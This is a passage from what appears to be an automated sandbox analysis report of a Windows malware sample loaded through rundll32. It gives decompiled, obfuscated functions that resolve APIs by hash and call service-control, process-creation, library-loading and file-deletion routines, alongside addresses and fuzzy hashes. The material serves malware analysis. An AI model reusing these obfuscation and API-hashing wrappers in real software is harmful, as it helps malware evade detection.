				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E004A606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

0x004ae178
0x004ae17b
0x004ae17e
0x004ae181
0x004ae185
0x004ae186
0x004ae18b
0x004ae192
0x004ae19e
0x004ae1a5
0x004ae1ac
0x004ae1b3
0x004ae1ba
0x004ae1c1
0x004ae1c8
0x004ae1cf
0x004ae1d6
0x004ae1dd
0x004ae1e4
0x004ae1eb
0x004ae1f2
0x004ae1f6
0x004ae1fd
0x004ae21c
0x004ae22d
0x004ae232

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 004AE22D

Strings

,., xrefs: 004AE192

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: 55959225479f4c441421779daa2df4dc9413fc92f639d4f96c1d3bee7b7167ce
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: 741107B6D0020DFFEF01DFE4C94A8AEBB70FB14308F108188E92566261D3B58B549F91

Uniqueness

Uniqueness Score: -1.00%

Function 004B7998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E004B7998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E004AE171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E004A606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x004b799e
0x004b79a1
0x004b79a4
0x004b79a9
0x004b79ae
0x004b79b5
0x004b79bc
0x004b79c3
0x004b79c7
0x004b79ce
0x004b79d5
0x004b79dc
0x004b79e3
0x004b79ea
0x004b79f1
0x004b79f5
0x004b79f9
0x004b79fd
0x004b7a04
0x004b7a0b
0x004b7a12
0x004b7a19
0x004b7a1d
0x004b7a30
0x004b7a37
0x004b7a3e
0x004b7a3f
0x004b7a4a
0x004b7a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 004B7A4A

Strings

rV, xrefs: 004B79C7

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: 912ebfe5a770335b6059e8bb1d420ab04ddaa805dbcd570b55040b0ff51d6d9a
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: E311F6B6D1160DBBDB14DFA4C84A49EBBB4BB10709F208588E52566250D3B44B149F50

Uniqueness

Uniqueness Score: -1.00%

Function 004BC7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E004BC7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E004A606F(_t44);
				ExitProcess(0);
			}

0x004bc7c9
0x004bc7cd
0x004bc7d4
0x004bc7db
0x004bc7e2
0x004bc7e9
0x004bc7ed
0x004bc7f4
0x004bc7fb
0x004bc802
0x004bc809
0x004bc810
0x004bc817
0x004bc81e
0x004bc825
0x004bc82c
0x004bc833
0x004bc83b
0x004bc842
0x004bc849
0x004bc85c
0x004bc862
0x004bc863
0x004bc86a
0x004bc86b
0x004bc875

APIs

ExitProcess.KERNELBASE(00000000), ref: 004BC875

Strings

C, xrefs: 004BC817

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: d4bd1ad0d0831532cafe90fdec2b16b6bff4c182ecd13537a4456b431c8416a8
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: EF114CB5D0130DEBEB44CFE5C94A5EEBBB0FB04318F108189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 004B0DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E004B0DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E004AE171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E004A606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x004b0deb
0x004b0dee
0x004b0df1
0x004b0df6
0x004b0dfb
0x004b0e04
0x004b0e0b
0x004b0e18
0x004b0e1c
0x004b0e1f
0x004b0e26
0x004b0e32
0x004b0e37
0x004b0e3a
0x004b0e41
0x004b0e4c
0x004b0e4d
0x004b0e4e
0x004b0e55
0x004b0e58
0x004b0e5f
0x004b0e66
0x004b0e6d
0x004b0e78
0x004b0e79
0x004b0e7c
0x004b0e8f
0x004b0e9a
0x004b0e9f

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 004B0E9A

Strings

Hh, xrefs: 004B0E58

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: 14612e11864556b7a8b696b7e51eb18a418f2f884b16a7972744e1fda71bd5cd
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: 22110374D0020DEBEF05DFA9C9469AEBFB5EB40304F60C599E524AB261D3B95B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 004B8409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004B8409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E004AE171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E004A606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x004b8411
0x004b8416
0x004b8418
0x004b841b
0x004b841e
0x004b841f
0x004b8422
0x004b8425
0x004b8428
0x004b842b
0x004b842c
0x004b842f
0x004b8432
0x004b8435
0x004b8437
0x004b843c
0x004b8445
0x004b8448
0x004b8455
0x004b8458
0x004b845f
0x004b8462
0x004b8469
0x004b8470
0x004b8474
0x004b847b
0x004b8487
0x004b8488
0x004b8494
0x004b8499
0x004b84a0
0x004b84aa
0x004b84b5
0x004b84b8
0x004b84d7
0x004b84ee
0x004b84f5

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 004B84EE

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: 1b1259fba400509eaf4b23643a24eb96753512fa39c73b89ffbe1eef681ac5e3
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: 9F310676901208FBDF05DF95CD058DEBFB6FF89304F108199F924A6250D7B69A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 004B8165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004B8165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004AE171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E004A606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

0x004b816e
0x004b8173
0x004b8175
0x004b8176
0x004b8179
0x004b817b
0x004b817e
0x004b817f
0x004b8182
0x004b8183
0x004b8186
0x004b8189
0x004b818c
0x004b818d
0x004b818e
0x004b8191
0x004b8194
0x004b8195
0x004b8196
0x004b819b
0x004b81a4
0x004b81a8
0x004b81af
0x004b81b6
0x004b81c3
0x004b81c7
0x004b81cf
0x004b81d4
0x004b81d7
0x004b81de
0x004b81e9
0x004b81ea
0x004b81eb
0x004b81f2
0x004b81f5
0x004b81fc
0x004b8203
0x004b8207
0x004b820e
0x004b8221
0x004b8222
0x004b823a
0x004b8242

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 004B823A

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: d46382f06ef91b50486508701c6b46298162d6cfd40919a09ce78059ad6703bd
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: 9221F4B690020DBFEF05CFA5CC86CEEBFB9FB44358F008199F91466260D3B59A519B50

Uniqueness

Uniqueness Score: -1.00%

Function 004A94A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004A94A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E004AE171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E004A606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

0x004a94ae
0x004a94b0
0x004a94c1
0x004a94c6
0x004a94cf
0x004a94d6
0x004a94dd
0x004a94ea
0x004a94ee
0x004a94f1
0x004a94f5
0x004a94fc
0x004a9503
0x004a951a
0x004a951d
0x004a9524
0x004a952b
0x004a9534
0x004a9537
0x004a953a
0x004a954d
0x004a955b
0x004a9562

APIs

SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004A955B

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: 5cb93506c2d58b8e265418486ef5aa8d3d9771644895fbeb96fc5c1b2857c07f
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: A1214475E01208BBEB18DFA5C94AADEBFB5EB40704F10849AF814AB291D3B45B159B90

Uniqueness

Uniqueness Score: -1.00%

Function 004A8289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004A8289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E004AE171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E004A606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x004a8290
0x004a8295
0x004a829a
0x004a82a8
0x004a82ab
0x004a82af
0x004a82b5
0x004a82b6
0x004a82bd
0x004a82c4
0x004a82c8
0x004a82cf
0x004a82d6
0x004a82dd
0x004a82e4
0x004a82eb
0x004a82f2
0x004a82f9
0x004a8300
0x004a8307
0x004a8311
0x004a8319
0x004a8332
0x004a833d
0x004a8343

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 004A833D

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: 605b26582de4d1e812ccc69dd0f1905ffb477b1d65e5c189277a20c838958eec
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: D6115B75E0120CFBEB08DFE9C84A4DEBBB5FB54308F108188E410A6264D3B84B498F54

Uniqueness

Uniqueness Score: -1.00%

Function 004A3296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004A3296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E004AE171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E004A606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

0x004a329d
0x004a32a0
0x004a32a3
0x004a32a4
0x004a32a9
0x004a32af
0x004a32b3
0x004a32ba
0x004a32c1
0x004a32c8
0x004a32cc
0x004a32d3
0x004a32da
0x004a32e1
0x004a32e5
0x004a32ec
0x004a32f3
0x004a32f7
0x004a32fe
0x004a3305
0x004a3311
0x004a331c
0x004a331f
0x004a333e
0x004a3347
0x004a334d

APIs

SHFileOperationW.SHELL32 ref: 004A3347

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: efe7518974bc321b2f2baa4e8cb1ce39ea3567d1e97d318a2a907198a66ecfe8
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: 171116B1D04219EBEB14DFE5C94AAEEBBB4EB44308F108199E414A7251C3B91B488F91

Uniqueness

Uniqueness Score: -1.00%

Function 004B9EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004B9EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E004AE171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E004A606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x004b9ef2
0x004b9ef7
0x004b9efa
0x004b9efb
0x004b9eff
0x004b9f00
0x004b9f05
0x004b9f0f
0x004b9f1b
0x004b9f1e
0x004b9f21
0x004b9f28
0x004b9f2f
0x004b9f36
0x004b9f4d
0x004b9f50
0x004b9f57
0x004b9f5e
0x004b9f65
0x004b9f6c
0x004b9f73
0x004b9f7a
0x004b9f8d
0x004b9f9a
0x004b9fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,004B5A72,0000B2BF), ref: 004B9F9A

Memory Dump Source

Source File: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000C.00000002.2150108117.00000000004A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2150174332.00000000004BF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: cb0546e08ba85547f5cc258f32eef9a345a5e6d46dc9018a23a846de834dc092
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: F811F3B5D0122DABDB04DFE9C84A9EEBFB4EF05344F10814AE815A6250D3B45B608FA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2196 Parent PID: 2968 rundll32.exeCOMMON

Executed Functions

Function 001D7FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E001D7FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001CE171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E001C606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

APIs

